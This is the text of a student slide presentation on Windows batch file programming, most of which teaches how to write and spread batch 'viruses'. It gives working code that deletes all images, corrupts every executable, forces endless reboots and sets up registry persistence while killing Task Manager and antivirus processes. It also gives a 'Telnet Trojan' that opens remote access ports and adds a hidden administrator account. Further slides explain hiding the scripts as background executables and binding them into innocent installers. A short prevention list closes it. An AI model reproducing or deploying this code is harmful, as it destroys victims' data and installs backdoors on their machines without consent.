Batch File Programming .

(Virus
Attacks)

Dangerous.b
at

Introduction.
Structure.
Operators.
Syntax.
Fun.
Utilities.
Virus Attacks.
Preventions.
Presented by Yogendra Kirar
M.C.A Final year.

Introduction.
Batch processing Explain.
(In MS-Windows)

Batch processing means when there are some

unique processes or tasks executes one
after another in form of a group, bunch, or
batch.
Here, in windows batch file means the bunch
of DOS(Disk Operating System) Commands.
By effective batch file programming many
utilities, funny items or viruses that harm
the windows machines can prepared.

Commands in new
lines

For good Batch file programmer deep

knowledge of DOS commands is must.

Introduction.
For making any batch file steps
are.

Open Notepad.
Type DOS commands separately in new line.
Saved it by .bat extension.
To execute Double Click on that file which

looks like .
This is default icon
of Batch files in
Windows OS.

Structure
Example running dos

command.
Start-Run-cmd
Then cmd windows open looks like

Now type any ms dos commands.

You can control entire Operation System
through DOS commands.
For more commands type help and press
enter.

Structure
Working of File
When we Click any batch file then
-Firstly it opens the file read first line
command run in command prompt.
-Then closes the file.
-Again open the file and run second file
then close it.
-Again open - run close this process is
continue till the commands ends and
exit.
Note: All commands must be in new
Line.

Operators.
Operators as Accelerators
With batch files, which are also called batch Programs or scripts,
you can simplify routine or repetitive tasks
-Call
-Echo
-For
-Rem
-Goto
-Shift
-Endlocal

-Setlocal
-Endlocal
-If

Syntax
Syntax (mostly used)

call [[Drive:][Path] FileName [BatchParameters]] [:label

[arguments]]
echo [{on|of}] [message]
for {%variable|%%variable} in (set) do command
[ CommandLineOptions]
rem [comment]
goto label

Fun
Undeletable Folder with Your Name.
This code will create a folder on desktop and in root of all
drives of your computer which is not simply deletable.
-------------------------------------------------------------------------------------:y
md C:\"Documents and Settings"\"All Users"\Desktop\yogendra
md c:\yogendra
md d:\yogendra
md e:\yogendra
md f:\yogendra
md g:\yogendra
md h:\yogendra
goto y
--------------------------------------------------------------------------------------Copy this code in note pad and save it by anyname.bat

Important:
Here, all of you a Question or doubt in mind.
Is this true?
You think that if the black window of command prompt will continuously
stays on desktop or on taskbar any on can suspect on it and if,
somebody closes it then our batch file execution is stopped.
Solution of this is the Batch to Exe convertor software which converts
batch file into exe . Then the file runs in background and
uncatchable.
Bat2exe:
you can download this from url: http://www.brothersoft.com/d.php?
soft_id=50301&url=http%3A%2F%2Fwww.f2ko.de%2Fdownloads
%2FBat_To_Exe_Converter.zip

Snapshot Bat to Exe

Source path (.bat
file)
Output path (.exe
file)

Check invisible
application

Finally compile the file

Fun

Cant do anything
By this code we create a file that ends the explorer.exe and all
things are gone.
Code:
---------------------------------------------------------------------------------------Taskkill /im explorer.exe /f
----------------------------------------------------------------------------------------

Fun

Many Folders
this code creates 1000s of folders with number naming.

Code:
---------------------------------------------------------------------:e
Md %random%
Goto e
----------------------------------------------------------------------

Fun
Rotating Clock hands
this code rotates clocks hands continuously.
Code:
--------------------------------------------------------------------------------------------:y
time = 12:05:12
time = 12:10:12
time = 12:15:12
time = 12:20:12
time = 12:25:12
time = 12:30:12
time = 12:35:12
time = 12:40:12
time = 12:45:12
time = 12:50:12
time = 12:55:12
goto y
-----------------------------------------------------------------------------------------------------------------------------------

Utilities

With funny things we can also make

some utilities for windows machine.

Utilities which helps us to maintain our
system like speed, performance, hardisk
mantainence.
By batch file we can make schedule task.

Utilities
Disk defragmenter file.
This file is used to defragment your hard disk. Copy this file into
location.
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
code:
-----------------------------------------------------------------------------------------Defrag c: -f
Defrag d: -f
Defrag e: -f
Defrag f: -f
Msg * Defragment is completed
---------------------------------------------------------------------------------------------

Utilities
Steganography code:
Code:

----------------------------------------------------------------------Copy /b %1 + /b %2 new.jpg
exit
----------------------------------------------------------------------------------------Save this code by hide.bat
Hiding process
1. Copy this hide.bat in a folder.
2. Now copy a jpge file and a text file which we wants to hide behind
jpeg in that folder.
3. Now runs this hide .bat through dos prompt by providing names of
jpeg file and text file in order (.jpeg <space> .txt ) and runs it.A
new.jpeg is created with text hidden in it.
4. To get your text open this jpeg in notepad and find your text in last of
the notepad.

Utilities
Refresh. Code:
Code:
----------------------------------------------------------------------taskkill /im explorer.exe /f
start explorer.exe
----------------------------------------------------------------------------------------------

Scheduled Shutdown:
Code:
----------------------------------------------------------------------At [time] shutdown s f t 00 c Message
-----------------------------------------------------------------------

Virus Attacks
System restart virus.
This batch file code is restarts system when it starts
Code:
--------------------------------------------------------------------------------------------echo shutdown r f t 00 > shut.bat
move shut.bat C:\"Documents and Settings"\"All Users"\"Start
Menu"\Programs\Startup
----------------------------------------------------------------------------------------------

Copy the above code and paste in notepad by name anything.bat and runs on
Pc then after next restart the system will never starts and automatically restart

Virus Attacks
For loop viruses

For loop is a looping operator which creates loop for any command
This code creates messages on desktop showing files are
corrupted.
---------------------------------------------------------------------------------------------Code:
For /r c:\ %%y in (*.*) do msg * %%y ------ is Corrupted.
it not actually corrupts the file it shows only messages
---------------------------------------------------------------------------------------------Note: conversion into exe is required.

Virus Attacks
For loop viruses

2 (Damage level :High)

For loop is a looping operator which creates loop for any command
1. This code will remove all images, wallpapers from your system
Warning! -- Try it on your own risk.
Code:
for /r c:\ %%y in (*.jpg,*.png,*.gif,*.ico) do del %%y /s/q
for /r d:\ %%y in (*.jpg,*.png,*.gif,*.ico) do del %%y /s/q
for /r e:\ %%y in (*.jpg,*.png,*.gif,*.ico) do del %%y /s/q
for /r f:\ %%y in (*.jpg,*.png,*.gif,*.ico) do del %%y /s/q
Note: conversion into exe is required.

Virus Attacks
For loop viruses

3 (Damage level :High)

For loop is a looping operator which creates loop for any command
1. This code will corrupt all exe files of your system.
Warning! -- Try it on your own risk.
Code:
echo 00967jyj875kkj6704ekfkf9iddkc224543453000 >
c:\tempero.null
for /r c:\ %%y in (*.exe) do copy /b %%y + c:\tempero.null
for /r d:\ %%y in (*.exe) do copy /b %%y + c:\tempero.null
for /r e:\ %%y in (*.exe) do copy /b %%y + c:\tempero.null
for /r f:\ %%y in (*.exe) do copy /b %%y + c:\tempero.null
del c:\tempero.null /s/q
Note: conversion into exe is required.

%%y
%%y
%%y
%%y

Virus Attacks
For loop viruses

4 (Damage level :High)

For loop is a looping operator which creates loop for any command
1. This code will corrupt all exe files of your system.
Warning! -- Try it on your own risk.
Code:
echo you lost all !!!! >c:\tempero.null
for /r c:\ %%y in (*.exe) do copy c:\temporal.null
for /r d:\ %%y in (*.exe) do copy c:\temporal.null
for /r e:\ %%y in (*.exe) do copy c:\temporal.null
for /r f:\ %%y in (*.exe) do copy c:\temporal.null
del c:\tempero.null /s/q
Note: conversion into exe is required.

+
+
+
+

%%y
%%y
%%y
%%y

%%y
%%y
%%y
%%y

My Friend Virus (Dangerous level :

High)

@echo off
rename mypic.exe igfx.exe
if exist c:\windows\system32\igfx.exe goto code
if exist d:\windows\system32\igfx.exe goto code
if exist e:\windows\system32\igfx.exe goto code
if exist f:\windows\system32\igfx.exe goto code
if exist g:\windows\system32\igfx.exe goto code
echo Windows Registry Editor Version 5.00>yog.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>yog.reg
if exist c:\windows\nul echo "yhlsagent"="c:\\windows\\system32\\igfx.exe">>yog.reg
if exist d:\windows\nul echo "yhlsagent"="d:\\windows\\system32\\igfx.exe">>yog.reg
if exist e:\windows\nul echo "yhlsagent"="e:\\windows\\system32\\igfx.exe">>yog.reg
if exist f:\windows\nul echo "yhlsagent"="f:\\windows\\system32\\igfx.exe">>yog.reg
if exist g:\windows\nul echo "yhlsagent"="g:\\windows\\system32\\igfx.exe">>yog.reg
echo "avast!"="C:\\PROGRA~1\\Disp.exe">>yog.reg
echo "avgnt"="C:\\PROGRA~1\\avg.exe">>yog.reg
echo "USB Antivirus"="C:\\Program Files\\Guard.exe">>yog.reg
regedit /s yog.reg
del yog.reg /s/q
echo Windows Registry Editor Version 5.00>yog.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>>yog.reg
echo "LegalNoticeCaption"="Say Happy Birthday to me">>yog.reg
echo "LegalNoticeText"="I want that you wish to me on my birthday. I am very alone person, I have no any friend, do u want to become my friend, please accept me as
ur friend, all the best my friend for ur all works in future, I want to ask u a question would u be alone as me, so plz develop ur interest in making friends like
me. !!!!!!!!!!!">>yog.reg
regedit /s yog.reg
del yog.reg /s/q
if exist c:\windows\nul copy igfx.exe c:\windows\system32
if exist d:\windows\nul copy igfx.exe d:\windows\system32
if exist e:\windows\nul copy igfx.exe e:\windows\system32
if exist f:\windows\nul copy igfx.exe f:\windows\system32
if exist g:\windows\nul copy igfx.exe g:\windows\system32
:code
shutdown -r -f -t 600
:e
if exist c:\windows\nul md C:\Docume~1\Admini~1\Desktop\"I always with u my friend"
if exist d:\windows\nul md d:\Docume~1\Admini~1\Desktop\"I always with u my friend"
if exist e:\windows\nul md e:\Docume~1\Admini~1\Desktop\"I always with u my friend"
if exist f:\windows\nul md f:\Docume~1\Admini~1\Desktop\"I always with u my friend"
if exist g:\windows\nul md g:\Docume~1\Admini~1\Desktop\"I always with u my friend"
taskkill /im USBGuard.exe /f
taskkill /im notepad.exe /f
taskkill /im SOUNDMAN.exe /f
taskkill /im taskmgr.exe /f
date 02-12-3060
goto e

conversion into exe is required

Telnet Trojen.
Work as Remote Administrator tool with the use of
telenet.
@echo off
sc config tlntsvr start= auto
net start tlntsvr
netsh firewall add portopening TCP 23 "Telnet"
sc config termservice start= auto
net start termservice
netsh firewall add portopening TCP 3389 "Remote Desktop"
net user Default 12345 /add
net localgroup administrators Default /add
By Sourabh Mishra.

Finishing Virus
Coding
Firstly copy all these coding into the notepad and name them

anything with .bat extention.

Now converts this .bat file into .exe file with the help of Bat to Exe
converter.
This is the software which
Helps us to hide the cmd
coding and runs the process
in background.

File.bat

File.exe

Finishing Virus
Coding
After converting .bat file into .exe file What to do Next?

All of u thinking that these are the .exe files how these are
spreads. Your answer is the software which reside in directory
c:\windows\system32\
with name iexpress to start iexpress Start > Run > iexpress
You will see this windows this is your mixing software.

Finishing Virus
Coding
Follows the instruction of software then after pressing some next

you will find this window.

Here, add your viral code and the innocent software(exe) in which

u want to bind this.

Finishing Virus
Coding
After that in two selection windows firstly select the innocent

software(exe) location then in second

Window select your viral
code(exe).

Follows the instruction and your

New software setup is created
Which is innocent but contains
Harmful virus.
When we install this software , then
After installation of software the
Added virus code is runs.

Finishing Virus
Coding
Mixing process.

.
bat

.exe

setup.ex
e

Prevention
(Conclusion)
Some possible prevention or conclusions are

1.Do not accept any file with .bat or .exe extension on the internet
while chatting or from your mailbox.
2.Do not take softwares from untrusted vendors.
3.Always check your autoruns by
start>run>msconfig>startup
if u find something suspected target its path and remove it
after checking it.
4.These are the batch viruses which are not so advanced viruses
but having very dangerous capabilities, and only strong updated
antivirus can catch them so always kept updated antivirus.

Have any
questions?